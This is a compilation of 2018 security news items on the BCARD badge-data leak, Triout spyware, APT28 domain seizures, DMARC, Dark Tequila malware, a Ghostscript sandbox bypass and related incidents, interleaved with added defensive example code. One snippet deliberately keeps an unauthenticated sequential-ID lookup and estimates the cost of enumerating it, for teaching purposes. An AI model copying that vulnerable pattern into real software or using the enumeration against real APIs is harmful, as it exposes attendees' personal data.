At Black Hat the tag was scanned using BCARD, a trade-show and conference badge reading application developed by ITN International. The app is designed to work on tablets and phones running Android or iOS.


A researcher who uses the online moniker “NinjaStyle” analyzed the BCARD application and discovered an API endpoint that returned an attendee’s data without any authentication, given only the unique badgeID value assigned to each user.

NinjaStyle then conducted some tests to determine if a brute-force attack could be used to obtain information on all Black Hat attendees.

“After trying a few hundred requests on both 0-100000 and 000000-100000 and receiving no valid badges, I determined that those were likely not going to be valid ID ranges. We could then assume that valid IDs are 100000-999999. This leaves us with 900,000 total requests. With an estimated 18,000 BlackHat attendees, we can then assume that we will enumerate a valid badgeID in approximately 2% of our requests,” the researcher wrote in a blog post published on Monday.

He determined that a brute-force attack on the API would allow an attacker to obtain the names, email addresses, company names, phone numbers and addresses of all Black Hat attendees in roughly six hours.
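What made this exploitable was the combination of no authentication, a small sequential ID space and no rate limiting, so the cost of enumerating every attendee was just the request count. The following is an added example, not ITN’s code: the BCARD schema, API and the fix it shipped are not public, so the record layout, the session handling, the `lookup_vulnerable`/`lookup_hardened`/`tag_token` names and the lookup budget are all assumptions. It shows the vulnerable lookup pattern beside a hardened one, and reproduces the researcher’s enumeration arithmetic.

```python
"""Unauthenticated lookup by sequential badge ID, beside a hardened version (added example)."""
import hashlib
import hmac
import secrets

# Constructed registration records; the real BCARD schema is not known here.
ATTENDEES = {
    100001: {"name": "A. Example", "email": "a@example.org", "company": "Example Corp"},
    234567: {"name": "B. Sample", "email": "b@example.net", "company": "Sample LLC"},
}


def lookup_vulnerable(badge_id):
    """The pattern described in the article: anyone who can guess a badge ID gets the
    record back. Six-digit integers make the whole space trivially enumerable."""
    return ATTENDEES.get(badge_id)


def enumeration_estimate(id_space, attendees, requests_per_second):
    """Cost of walking the ID space: share of requests that hit, and wall-clock hours."""
    return {
        "hit_rate": attendees / id_space,
        "hours": id_space / requests_per_second / 3600,
    }


# Hardened version, three changes that each break the attack on its own:
#  (1) the caller must hold a valid scanner session (hypothetical vendor login),
#  (2) the record is keyed by an unguessable token carried in the NFC tag, not by the
#      sequential ID, so knowing the ID range gives nothing,
#  (3) each session gets a lookup budget, so mass enumeration is loud and bounded.
TAG_SECRET = secrets.token_bytes(32)   # server-side secret, rotated per event (assumed)
SESSIONS = {}                          # session token -> {"vendor": ..., "lookups": n}
MAX_LOOKUPS = 500                      # per-session budget (assumed)


def tag_token(badge_id):
    """Token written to the badge: HMAC of the ID under the server secret. It is not
    derivable from the ID without the secret and does not follow a sequence."""
    return hmac.new(TAG_SECRET, str(badge_id).encode(), hashlib.sha256).hexdigest()


TOKEN_INDEX = {tag_token(i): i for i in ATTENDEES}


def open_session(vendor):
    """Issue a random session token to an authenticated scanner (auth itself assumed)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = {"vendor": vendor, "lookups": 0}
    return token


def lookup_hardened(session_token, token_from_tag):
    sess = SESSIONS.get(session_token)
    if sess is None:
        raise PermissionError("no valid scanner session")
    sess["lookups"] += 1
    if sess["lookups"] > MAX_LOOKUPS:
        raise PermissionError("lookup budget exhausted")
    badge_id = TOKEN_INDEX.get(token_from_tag)
    return ATTENDEES.get(badge_id) if badge_id is not None else None


if __name__ == "__main__":
    print(lookup_vulnerable(100001))                      # leaks with no credentials
    print(enumeration_estimate(900_000, 18_000, 42))      # ~2% hit rate, ~6 hours
    s = open_session("booth-17")
    print(lookup_hardened(s, tag_token(234567)))          # works for the real tag
    print(lookup_hardened(s, "0" * 64))                   # guessed token: nothing
```

Disabling the endpoint, as ITN did, is the quickest fix; when the lookup has to stay, the session check is the minimum and the unguessable tag token is what actually removes the enumeration attack, because a budget alone only slows a distributed scraper down.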

The researcher reported his findings to ITN on August 9 and while he initially encountered some difficulties in establishing contact with the company, the issue was patched by August 13. ITN said it had addressed the vulnerability by disabling the problematic API, which it claimed had been a legacy system.

This is not the first time experts have found vulnerabilities in one of the apps used at the Black Hat conference. Back in 2016, the event’s organizers were forced to update the official application after researchers discovered several flaws that could have been exploited to impersonate users and spy on them.

Also in 2016, researchers found that the badge scanning application provided by RSA Conference organizers to vendors had been affected by a security bypass flaw caused by a default password left in the code.

New Spyware Framework for Android Discovered
21.8.2018 securityweek

A newly identified spyware framework can be used to build extensive surveillance capabilities into Android applications, Bitdefender security researchers warn.

Dubbed Triout, the malware made its first appearance on May 15, when a sample was uploaded to VirusTotal. Although initially submitted from Russia, most of the scans came from Israel.

The malware’s command and control (C&C) server has been running since May 2018 as well, and Bitdefender says that it appears to continue to be operational at the time of this report.

In a technical whitepaper (PDF), Bitdefender’s Cristofor Ochinca explains that the analyzed sample doesn’t use obfuscation, so the researchers could read the application’s code (unobfuscated Dalvik bytecode decompiles cleanly, with class and method names intact) immediately after unpacking the APK file.

“This could suggest the framework may be a work-in-progress, with developers testing features and compatibility with devices,” Ochinca points out.

The spyware was discovered bundled with a repackaged application that kept the appearance and all the functionality of the original, supposedly so as not to tip victims off. The malicious payload is the only thing that sets the two apart.

Once on a compromised system, Triout can start its extensive surveillance capabilities, which range from phone call recording to GPS tracking.

Specifically, the malware can record every phone call, save it in the form of a media file, and send the recording, along with the caller ID, to the C&C server. Moreover, it forwards every incoming SMS message to the C&C (both the SMS body and the sender are exfiltrated).

Triout also sends all snapped photos to the C&C, regardless of whether taken with the front or rear camera, and can send call logs to the server as well. On top of all that, it can send the device’s GPS coordinates to the C&C, and can hide itself on the infected device.

What the security researchers couldn’t determine as of now is how the infected application was disseminated.

The sample was a repackaged version of an adult application that was listed in Google Play in 2016, but was since removed. Thus, the actor might have used third-party marketplaces or attacker-controlled domains to host the sample, Bitdefender says.

Microsoft's Anti-Hacking Efforts Make it an Internet Cop
21.8.2018 securityweek BigBrothers

Intentionally or not, Microsoft has emerged as a kind of internet cop by devoting considerable resources to thwarting Russian hackers.

The company's announcement Tuesday that it had identified and forced the removal of fake internet domains mimicking conservative U.S. political institutions triggered alarm on Capitol Hill and led Russian officials to accuse the company of participating in an anti-Russian "witch hunt."

Microsoft stands virtually alone among tech companies with an aggressive approach that uses U.S. courts to fight computer fraud and seize hacked websites back. In the process, it has acted more like a government detective than a global software giant.

In the case this week, the company did not just accidentally stumble onto a couple of harmless spoof websites. It seized the latest beachhead in an ongoing struggle against Russian hackers who meddled in the 2016 presidential election and a broader, decade-long legal fight to protect Microsoft customers from cybercrime.

"What we're seeing in the last couple of months appears to be an uptick in activity," Brad Smith, Microsoft's president and chief legal officer, said in an interview this week. Microsoft says it caught these particular sites early and that there's no evidence they were used in hacking.

The Redmond, Washington, company sued the hacking group best known as Fancy Bear in August 2016, saying it was breaking into Microsoft accounts and computer networks and stealing highly sensitive information from customers. The group, Microsoft said, would send "spear-phishing" emails that linked to realistic-looking fake websites in hopes targeted victims — including political and military figures — would click and betray their credentials.

The effort is not just a question of fighting computer fraud but of protecting trademarks and copyright, the company argues.

One email introduced as court evidence in 2016 showed a photo of a mushroom cloud and a link to an article about how Russia-U.S. tensions could trigger World War III. Clicking on the link might expose a user's computer to infection, hidden spyware or data theft.

An indictment from U.S. special counsel Robert Mueller has tied Fancy Bear to Russia's main intelligence agency, known as the GRU, and to the 2016 email hacking of both the Democratic National Committee and Democrat Hillary Clinton's presidential campaign.

Some security experts were skeptical about the publicity surrounding Microsoft's announcement, worried that it was an overblown reaction to routine surveillance of political organizations — potential cyberespionage honey pots — that never rose to the level of an actual hack.

The company also used its discovery as an opportunity to announce its new free security service to protect U.S. candidates, campaigns and political organizations ahead of the midterm elections.

But Maurice Turner, a senior technologist at the industry-backed Center for Democracy and Technology, said Microsoft is wholly justified in its approach to identifying and publicizing online dangers.

"Microsoft is really setting the standards with how public and how detailed they are with reporting out their actions," Turner said.

Companies including Microsoft, Google and Amazon are uniquely positioned to do this because their infrastructure and customers are affected. Turner said they "are defending their own hardware and their own software and to some extent defending their own customers."

Turner said he has not seen anyone in the industry as "out in front and open about" these issues as Microsoft.

Microsoft's Windows operating systems, as industry leaders, had long been prime targets for viruses when in 2008 the company formed its Digital Crimes Unit, an international team of attorneys, investigators and data scientists. The unit became known earlier in this decade for taking down botnets, collections of compromised computers used as tools for financial crimes and denial-of-service attacks that overwhelm their targets with junk data.

Richard Boscovich, a former federal prosecutor and a senior attorney in Microsoft's digital crimes unit, testified to the Senate in 2014 about how Microsoft used civil litigation as a tactic. Boscovich is also involved in the fight against Fancy Bear, which Microsoft calls Strontium, according to court filings.

To attack botnets, Microsoft would take its fight to courts, suing on the basis of the federal Computer Fraud and Abuse Act and other laws and asking judges for permission to sever the networks' command-and-control structures.

"Once the court grants permission and Microsoft severs the connection between a cybercriminal and an infected computer, traffic generated by infected computers is either disabled or routed to domains controlled by Microsoft," Boscovich said in 2014.

He said the process of taking over the accounts, known as "sinkholing," enabled Microsoft to collect valuable evidence and intelligence used to assist victims.

In the latest action against Fancy Bear, a court order filed Monday allowed Microsoft to seize six new domains, which the company said were either registered or used at some point after April 20.

Smith said this week the company is still investigating how the newly discovered domains might have been used.

A security firm, Trend Micro, identified some of the same fake domains earlier this year. They mimicked U.S. Senate websites, while using standard Microsoft log-in graphics that made them appear legitimate, said Mark Nunnikhoven, Trend Micro's vice president of cloud research.

Microsoft has good reason to take them down, Nunnikhoven said, because they can hurt its brand reputation. But the efforts also fit into a broader tech industry mission to make the internet safer.

"If consumers are not comfortable and don't feel safe using digital products," they will be less likely to use them, Nunnikhoven said.

DMARC Use is Growing, But Difficult to Configure Correctly and Completely
21.8.2018 securityweek Safety

The Use of DMARC is Growing -- But it is Difficult to Configure Correctly and Completely

Valimail, an email security firm, has been looking at the incidence of fake emails. Not all emails, but just those that spoof the 'From:' line with a valid name and domain -- that is, exact-domain sender spoofing. These are perhaps the most difficult to spot and the most dangerous, resulting in spear-phishing attacks leading to stolen credentials and BEC scams. PhishMe, now known as Cofense, claims that 91% of all cyber-attacks start with a phishing email, while Trend Micro has estimated that global BEC losses will exceed $9 billion this year.

A report from GreatHorn published at the end of July 2017 suggests that the majority of email users do not consider it to be a serious threat vector. GreatHorn's CEO and co-founder Kevin O'Brien told SecurityWeek, "Sixty-six percent of all the people we interviewed said the only threat they saw in their inbox was spam." The implication is that organizations must not rely on users to spot the difference between genuine and fake emails.

The root problem behind all fake emails is the lack of built-in authentication in email itself. All security has to be applied from the outside; for exact-domain sender spoofing, this has been done with DMARC, SPF and DKIM. Valimail's analysis (PDF) of fake emails and DMARC examined a representative set of processed emails asking for DMARC or SPF authentication.

The good news is that in Q1 2018, 96.2% of emails using DMARC authentication were identified as legitimate. Not so good is that 1.5% failed DMARC but were from senders known to be legitimate. The worrying figure is the 2.3% of DMARC emails that failed DMARC and came from suspicious or malicious senders.

2.3% may seem a low percentage, but extrapolated, it suggests that 6.4 billion fake emails are sent every day.

The use of DMARC to prevent exact-domain sender spoofing is growing -- but it is difficult to configure correctly and completely. Every single service that sends emails must be found and included, and the policy must be set to enforced. DMARC, using SPF or DKIM authentication, aligns the stated sender with the actual source. If the alignment fails, the domain owner can choose between doing nothing (let it go through anyway), send it to a spam folder, or delete it. The mail gateway performing the checks then reports the results to the domain owner or a designated agent.
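As an added illustration of the alignment and policy logic just described (example code, not from Valimail or the report): a receiving gateway parses the sender domain's DMARC record, checks whether the SPF or DKIM authenticated identifier aligns with the From: domain, and maps the p= tag to a disposition. The records and domains are constructed; organizational_domain is a simplification that ignores the Public Suffix List.

```python
"""Minimal DMARC evaluation: record parsing, identifier alignment, disposition."""
from dataclasses import dataclass

# Constructed sample records: a monitor-only record (p=none, the "not enforced"
# state Valimail counts as a failure) and an enforced one with strict DKIM alignment.
RECORD_MONITOR = "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com"
RECORD_ENFORCED = "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc-reports@example.com"

VALID_POLICIES = ("none", "quarantine", "reject")


def parse_dmarc(txt):
    """Parse a DMARC TXT record ("tag=value; tag=value") into a dict of tag -> value."""
    tags = {}
    for part in txt.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC1 record")
    if tags.get("p") not in VALID_POLICIES:
        raise ValueError("missing or invalid p= policy tag")
    # Alignment modes default to relaxed ("r") when absent.
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    return tags


def organizational_domain(domain):
    """Rough organizational domain: last two labels (real code uses the Public Suffix List)."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(from_domain, auth_domain, mode):
    """Identifier alignment: strict needs an exact match, relaxed the same organizational domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return organizational_domain(from_domain) == organizational_domain(auth_domain)


@dataclass
class Verdict:
    dmarc_pass: bool
    disposition: str  # "deliver", "quarantine" or "reject"
    enforced: bool    # False for p=none: spoofs are only reported, never blocked


def evaluate(record_txt, from_domain, spf_pass_domain=None, dkim_pass_domain=None):
    """Return the DMARC verdict for one message.

    spf_pass_domain: the MAIL FROM domain if SPF passed, else None.
    dkim_pass_domain: the d= domain of a DKIM signature that verified, else None.
    """
    rec = parse_dmarc(record_txt)
    passed = (aligned(from_domain, dkim_pass_domain, rec["adkim"])
              or aligned(from_domain, spf_pass_domain, rec["aspf"]))
    policy = rec["p"]
    enforced = policy in ("quarantine", "reject")
    # Alignment failure under p=none still delivers; under an enforced policy the
    # domain owner's chosen action (quarantine or reject) is applied.
    disposition = "deliver" if passed or policy == "none" else policy
    return Verdict(passed, disposition, enforced)
```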

Valimail finds that most companies that start to implement DMARC never quite fully succeed. The enforcement failure rate, for example, hovers around 75-80% for almost all organizations over the last three quarters. The one bright spot is U.S. federal agencies. Here the failure rate tumbled from 80% in Q3 2017 to 40% in Q2 2018.

Federal agencies have also bucked the norm in all other categories examined by Valimail. By multiplying the category's DMARC usage rate with its enforcement success rate, Valimail comes up with a fraud protection rate. Federal agencies' fraud protection rate has grown from 4% in Q3 2017 to 43% in Q2 2018. The next best rate comes from the U.S. tech company category at less than 16% (global media companies fare worst at less than 4%).

Federal agencies are also ahead in DMARC usage. In Q3 2017, just 20% of agencies used DMARC. By Q2 2018, this had risen to more than 70%. Tech companies again come second, rising from just under 50% to just over 50% (and global media companies come bottom again at around 15%).

Valimail puts the huge improvement shown by federal agencies down to the DHS. "This is due directly to the Department of Homeland Security's October 2017 directive requiring all executive-branch agencies to implement DMARC on a one-year timeline," says the report. "Since the executive branch accounts for the vast majority of the 1,315 federal .gov domains, that directive, known as BOD 18-01, has had a huge impact on DMARC usage in this group."

"Valimail's research shows that fake email continues to be a major problem worldwide," comments Alexander García-Tobar, CEO and co-founder of Valimail. He added: "There are encouraging signs of progress in the fight against fake email, starting with the U.S. federal government, where we've seen an unprecedented deployment of anti-impersonation technologies, thanks to a mandate by the Department of Homeland Security. There's still a long way to go, but the DHS example shows that stopping email impersonation is both critical to our highest institutions and achievable."

Dark Tequila Añejo
22.8.2018 Kaspersky Hacking

Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.

A multi-stage payload is delivered to the victim only when certain conditions are met; avoiding infection when security suites are installed or the sample is being run in an analysis environment. From the target list retrieved from the final payload, this particular campaign targets customers of several Mexican banking institutions and contains some comments embedded in the code written in the Spanish language, using words only spoken in Latin America.

Most of the victims are located in Mexico. The campaign has been active since at least 2013, so it is a very ‘añejo’ (mature) product. There are two known infection vectors: spear-phishing and infection by USB device.

The threat actor behind it strictly monitors and controls all operations. If there is a casual infection, which is not in Mexico or is not of interest, the malware is uninstalled remotely from the victim’s machine.

(Translation for “Abrir la carpeta para ver los archivos” – “Open folder to see files”. The word “Archivos” is used by Spanish speakers from Latin America only)

The Dark Tequila malware and its supporting infrastructure are unusually sophisticated for a financial fraud operation. The malicious implant contains all the modules required for the operation and, when instructed to do so by the command server, different modules decrypt and activate. All stolen data is uploaded to the server in encrypted form.

The campaign's modules are as follows:

Module 1, which is responsible for communication with the command and control server. It verifies if a man-in-the-middle network check is being performed, by validating the certificates with a few very popular websites.
Module 2 – CleanUp. If the service detects any kind of ‘suspicious’ activity in the environment, such as the fact that it is running on a virtual machine, or that debugging tools are running in the background, it will execute this module to perform a full cleanup of the system, removing the persistence service as well as any files created previously on the system.
Module 3 – Keylogger and Windows Monitor. This is designed to steal credentials from a long list of online banking sites, as well as generic Cpanels, Plesk, online flight reservation systems, Microsoft Office365, IBM lotus notes clients, Zimbra email, Bitbucket, Amazon, GoDaddy, Register, Namecheap, Dropbox, Softlayer, Rackspace, and other services.
Module 4 – Information stealer, which is designed to steal saved passwords in email and FTP clients, as well as from browsers.
Module 5 – The USB infector. This copies an executable file to a removable drive to run automatically. This enables the malware to move offline through the victim’s network, even when only one machine was initially compromised via spear-phishing. When another USB is connected to the infected computer, it automatically becomes infected, and ready to spread the malware to another target.
Module 6 – The service watchdog. This service is responsible for making sure that the malware is running properly.
The campaign remains active. It is designed to be deployed in any part of the world, and attack any targets according to the interests of the threat actor behind it. Kaspersky Lab detects the campaign as Trojan.Win32.DarkTequila and Trojan.Win64.DarkTequila.


A critical remote code execution flaw in Ghostscript could allow attackers to completely take over affected systems
21.8.2018 securityaffairs

The popular Google Project Zero white hat hacker Tavis Ormandy has found a critical remote code execution (RCE) vulnerability in Ghostscript.
Ghostscript is an open source suite of software based on an interpreter for Adobe Systems' PostScript and Portable Document Format (PDF) page description languages.

Ghostscript is multiplatform software written in C; it converts PostScript language files (or EPS) to several other formats (i.e. PDF, XPS, PCL or PXL).

Many PDF and image editing software such as GIMP and ImageMagick leverage the library to convert file formats.

Ghostscript implements the -dSAFER option, a sandbox for handling untrusted documents that aims to prevent malicious PostScript operations from being executed.

A couple of years ago, Ormandy disclosed several -dSAFER sandbox escapes in the popular library, at the time he found a few file disclosure, shell command execution, memory corruption and type confusion bugs.

Now Ormandy discovered that the library contains multiple -dSAFER sandbox bypass flaws that could be exploited by a remote, unauthenticated attacker to execute arbitrary commands on a vulnerable system.

A remote attacker can trigger the flaw by sending a specially crafted malicious file (i.e. PDF, PS, EPS, or XPS) to the victim. Once the victim has opened the file with an application using the vulnerable software, the attacker will be able to execute arbitrary code on the system and take it over.

Artifex Software, the company that maintains the open source software, still hasn't released any security update to address the vulnerability.

The US-CERT published a security advisory to warn that applications using the Ghostscript library by default to process PostScript content are vulnerable.

“Ghostscript contains multiple -dSAFER sandbox bypass vulnerabilities, which may allow a remote, unauthenticated attacker to execute arbitrary commands on a vulnerable system.” reads the security advisory.

“By causing Ghostscript or a program that leverages Ghostscript to parse a specially-crafted file, a remote, unauthenticated attacker may be able to execute arbitrary commands with the privileges of the Ghostscript code.”

Both RedHat and Ubuntu distros have confirmed that they are affected by this vulnerability.

Ormandy recommends that Linux distributions disable the processing of PS, EPS, PDF, and XPS content until the vulnerability is fixed.

“I *strongly* suggest that distributions start disabling PS, EPS, PDF and XPS coders in policy.xml by default,” suggested Ormandy.
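To show what that recommendation looks like in practice, here is an added audit helper (not from Ormandy, Artifex or ImageMagick) that checks an ImageMagick policy.xml, the file Ormandy refers to, for coder entries that disable the Ghostscript-backed formats. The two policy documents are constructed samples: one leaves the coders enabled, the other blocks them with `rights="none"` entries.

```python
"""Audit an ImageMagick policy.xml for disabled Ghostscript-backed coders."""
import xml.etree.ElementTree as ET

# Formats that ImageMagick delegates to Ghostscript; Ormandy's advice is to
# disable these coders by default until Ghostscript is fixed.
GS_CODERS = ("PS", "PS2", "PS3", "EPS", "PDF", "XPS")

# Constructed sample: a default-style policy that leaves the Ghostscript coders enabled.
POLICY_WEAK = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="path" rights="none" pattern="@*"/>
</policymap>
"""

# Constructed sample: the same policy with the Ghostscript-backed coders blocked.
POLICY_HARDENED = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="path" rights="none" pattern="@*"/>
  <policy domain="coder" rights="none" pattern="PS"/>
  <policy domain="coder" rights="none" pattern="PS2"/>
  <policy domain="coder" rights="none" pattern="PS3"/>
  <policy domain="coder" rights="none" pattern="EPS"/>
  <policy domain="coder" rights="none" pattern="PDF"/>
  <policy domain="coder" rights="none" pattern="XPS"/>
</policymap>
"""


def blocked_coders(policy_xml):
    """Return the set of coder patterns whose rights are 'none' (fully disabled).

    Plain patterns are taken as written; the brace form "{PS,EPS}" that policy.xml
    accepts is expanded into its members. A pattern of "*" disables every coder.
    """
    root = ET.fromstring(policy_xml)
    blocked = set()
    for pol in root.iter("policy"):
        if pol.get("domain") != "coder":
            continue
        if pol.get("rights", "").strip().lower() != "none":
            continue
        pattern = pol.get("pattern", "").strip()
        if pattern.startswith("{") and pattern.endswith("}"):
            blocked.update(p.strip().upper() for p in pattern[1:-1].split(",") if p.strip())
        elif pattern:
            blocked.add(pattern.upper())
    return blocked


def unblocked_gs_coders(policy_xml):
    """Coders from GS_CODERS the policy still allows; an empty list means the mitigation is complete."""
    blocked = blocked_coders(policy_xml)
    if "*" in blocked:
        return []
    return [c for c in GS_CODERS if c not in blocked]
```

Run it over the host's real policy file (for example /etc/ImageMagick-6/policy.xml on Debian-based systems) to see which of the six coders are still reachable through ImageMagick.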

Microsoft says Russian hackers continue targeting 2018 midterm elections
21.8.2018 securityaffairs BigBrothers  APT

Microsoft has spotted a new hacking campaign targeting 2018 midterm elections, the experts attributed the attacks to Russia-linked APT28 group.
Microsoft has spotted a new hacking campaign targeting 2018 midterm elections.

The tech giant attributed to Russia-linked APT28 a series of cyber attacks aimed at members of the United States Senate, conservative organizations and think tanks.

The Russian APT group tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007 and operates under the Russian military agency GRU and continues to target US politicians.
According to Microsoft, the Russian cyberspies created at least six fake websites related to US Senate and conservative organizations to infect the visitors’ systems.


Three bogus domains were created to appear as legitimate sites belonging to the U.S. Senate; a fourth, non-political website spoofed Microsoft's online products.
The remaining websites were designed to mimic two U.S. conservative think tanks:

The Hudson Institute — a conservative Washington think tank.
The International Republican Institute (IRI) — a nonprofit group that promotes democracy worldwide and whose board includes prominent Republican figures like Sen. John McCain.
The fake sites were created over the past several months, hackers registered them with major web-hosting companies.

Microsoft did not provide further details on the attacks.

“One appears to mimic the domain of the International Republican Institute, which promotes democratic principles and is led by a notable board of directors, including six Republican senators and a leading senatorial candidate. Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity, among other important activities. Other domains appear to reference the U.S. Senate but are not specific to particular offices.” reads the post published by Microsoft.
“To be clear, we currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains.”
Microsoft’s Digital Crimes Unit shut down the fake websites with a court approval received last year and notified targeted organizations.
At this time it is not possible to say whether the fake sites allowed the cyberspies to compromise visitors' machines; Microsoft's post doesn't mention any sinkhole investigation conducted by its experts.
Microsoft has shut down dozens of other fake websites since 2016 after obtaining authorization from the authorities.
Experts believe that foreign states, especially Russia, will continue to attempt hacking into US politics and for this reason, Microsoft will continue to monitor any activity targeting US political groups and politicians.
“Despite last week’s steps, we are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States. Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.” continues Microsoft.
In July, speaking at the Aspen Security Forum, Microsoft VP Tom Burt announced that the tech company uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates.

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections.”

The discovery made by Microsoft is part of Microsoft's Defending Democracy Program, launched in April, which is focused on four priorities: protecting campaigns from hacking, protecting voting and the electoral process, increasing political advertising transparency, and defending against disinformation campaigns.

Microsoft also announced its AccountGuard initiative, which provides the following services to organizational and personal email accounts:

Threat notification across accounts. The Microsoft Threat Intelligence Center will enable Microsoft to detect and provide notification of attacks in a unified way across both organizational and personal email systems. For political campaigns and other eligible organizations, when an attack is identified, this will provide a more comprehensive view of attacks against campaign staff. When verifiable threats are detected, Microsoft will provide personal and expedited recommendations to campaigns and campaign staff to secure their systems.
Security guidance and ongoing education. Officials, campaigns and related political organizations will receive guidance to help make their networks and email systems more secure. This can include applying multi-factor authentication, installing the latest security updates and guidance for setting up systems that ensure only those people who need data and documents can access them. AccountGuard will provide updated briefings and training to address evolving cyberattack trends.
Early adopter opportunities. Microsoft will provide preview releases of new security features on a par with the services offered to our large corporate and government account customers.

Dark Tequila Banking malware targets Latin America since 2013
21.8.2018 securityaffairs

Kaspersky Labs detected a sophisticated piece of banking malware dubbed Dark Tequila that was used to target customers of several Mexican banks.
Security experts from Kaspersky Labs have spotted a sophisticated strain of banking malware dubbed Dark Tequila that was used to target customers of several Mexican financial institutions.

According to the researchers, the complex Dark Tequila malware has gone undetected since at least 2013.

Dark Tequila is a multistage malware that spreads via spear-phishing messages and infected USB devices.

The malware steals financial data for a long list of online banking sites from infected systems; it is also able to gather credentials for popular websites, business and personal email addresses, domain registrars, and file storage accounts.

The list of websites targeted by the malware includes “Cpanels, Plesk, online flight reservation systems, Microsoft Office 365, IBM Lotus Notes clients, Zimbra email, Bitbucket, Amazon, GoDaddy, Register, Namecheap, Dropbox, Softlayer, Rackspace, and other services.”

“Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.” reads the analysis published by Kaspersky.

“A multi-stage payload is delivered to the victim only when certain conditions are met; avoiding infection when security suites are installed or the sample is being run in an analysis environment.”

Kaspersky highlighted that the level of sophistication of the threat is unusual for financial fraud schemes; it implements complex evasion techniques. The malware is delivered only if certain technical conditions are met, and it is able to detect analysis environments and security solutions.

Dark Tequila campaign delivers an advanced keylogger that went undetected at least for five years due to its highly targeted nature and a few evasion techniques.

According to the experts, the threat actor behind the Dark Tequila malware strictly monitors and controls all operations. In case the malware accidentally infects a system, a machine that is not in Mexico or that is not of interest, the malware is uninstalled remotely from the victim's machine.

Dark Tequila has a modular structure, Kaspersky listed the following 6 primary modules:

Module 1, which is responsible for communication with the command and control server. It verifies if a man-in-the-middle network check is being performed, by validating the certificates with a few very popular websites.
Module 2 – CleanUp. If the service detects any kind of ‘suspicious’ activity in the environment, such as the fact that it is running on a virtual machine, or that debugging tools are running in the background, it will execute this module to perform a full cleanup of the system, removing the persistence service as well as any files created previously on the system.
Module 3 – Keylogger and Windows Monitor. This is designed to steal credentials from a long list of online banking sites, as well as generic Cpanels, Plesk, online flight reservation systems, Microsoft Office365, IBM lotus notes clients, Zimbra email, Bitbucket, Amazon, GoDaddy, Register, Namecheap, Dropbox, Softlayer, Rackspace, and other services.
Module 4 – Information stealer, which is designed to steal saved passwords in email and FTP clients, as well as from browsers.
Module 5 – The USB infector. This copies an executable file to a removable drive to run automatically. This enables the malware to move offline through the victim’s network, even when only one machine was initially compromised via spear-phishing. When another USB is connected to the infected computer, it automatically becomes infected, and ready to spread the malware to another target.
Module 6 – The service watchdog. This service is responsible for making sure that the malware is running properly.
The Dark Tequila campaign is still active, further details including the IoCs are reported in the blog post published by Kaspersky.

Crooks claim to have stolen 20k customer records from Superdrug cosmetics retailer
21.8.2018 securityaffairs Incident

Hackers claim to have stolen the personal details of almost 20,000 Superdrug customers who shopped online at the cosmetics retailer.
The British retailer Superdrug is the latest victim of a security breach; hackers claim to have stolen the personal details of almost 20,000 people who shopped online at the cosmetics retailer.

Hackers accessed customers’ names, addresses and in some cases dates of birth, phone number and points balances.

The company has confirmed the incident, the good news is that hackers did not access payment card details.

Superdrug notified customers of the incident via email, warning of the "possible disclosure of your personal data, but not including your payment card information."

The hackers contacted the company on Monday evening, informing it that they had obtained details on approximately 20,000 customers; as proof of the hack they shared details of 386 of the compromised accounts.

“The hacker shared a number of details with us to try and ‘prove’ he had customer information – we were then able to verify they were Superdrug customers from their email and log-in.” reported the DailyMail citing a spokeswoman for the company.

The hackers likely attempted to blackmail the company under the threat of publicly disclosing the hack.

The crooks alleged they had "obtained information on approximately 20,000 customers but we have only seen 386."


To customers who have received an email from us today, this email is genuine. We recommend you follow the steps we outlined.

6:29 PM - Aug 21, 2018
“On the evening of the 20th of August, we were contacted by hackers who claimed they had obtained a number of our customers’ online shopping information,” the note from boss Peter Macnab stated.

“There is no evidence that Superdrug’s systems have been compromised. We believe the hacker obtained customers’ email addresses and passwords from other websites and then used those credentials to access accounts on our website.”


Superdrug tried to downplay the incident, maintaining that the hackers obtained the credentials from third-party data breaches. Crooks exploited the fact that people reuse their passwords across various web services.

Anyway, Superdrug customers need to reset the password they use to access to

Superdrug reported the issue to the authorities and Action Fraud and it “will be offering them all the information they need for their investigation.”

“We have contacted the Police and Action Fraud (the UK’s national fraud and cyber crime arm) and will be offering them all the information they need for their investigation as we continue to take the responsibility of safeguarding our customers’ data incredibly seriously.” reads the note sent via email to the customers.

Adobe security updates address 2 critical code execution flaws in Photoshop
21.8.2018 securityaffairs

Yesterday Adobe released security updates for two critical code execution vulnerabilities affecting Windows and macOS versions of Photoshop CC.
Adobe released updates to address two critical code execution flaws affecting the Windows and macOS versions of Photoshop CC.

The vulnerabilities, tracked as CVE-2018-12810 and CVE-2018-12811, are memory corruption issues that could be exploited by a remote attacker to execute arbitrary code in the context of the targeted user.

